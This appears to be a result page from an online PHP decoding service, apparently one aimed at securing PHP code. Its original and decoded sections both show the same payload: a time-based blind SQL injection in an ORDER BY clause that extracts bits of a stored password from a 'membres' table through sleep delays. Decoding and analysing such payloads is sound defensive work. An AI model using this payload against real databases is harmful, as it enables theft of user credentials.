Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
ASC,(select (case field(concat(substring(bin(ascii(substring(password,3,1))),7,1)),char(48..
Decoded Output download
<? ASC,(select (case field(concat(substring(bin(ascii(substring(password,3,1))),7,1)),char(48),char(49)) when 1 then sleep(2) when 2 then sleep(4) end) from membres where id=1) ?>
Did this file decode correctly?
Original Code
ASC,(select (case field(concat(substring(bin(ascii(substring(password,3,1))),7,1)),char(48),char(49)) when 1 then sleep(2) when 2 then sleep(4) end) from membres where id=1)
Function Calls
| None |
Stats
| MD5 | 1a099fef4c103d9a9ccb9487467dbc10 |
| Eval Count | 0 |
| Decode Time | 89 ms |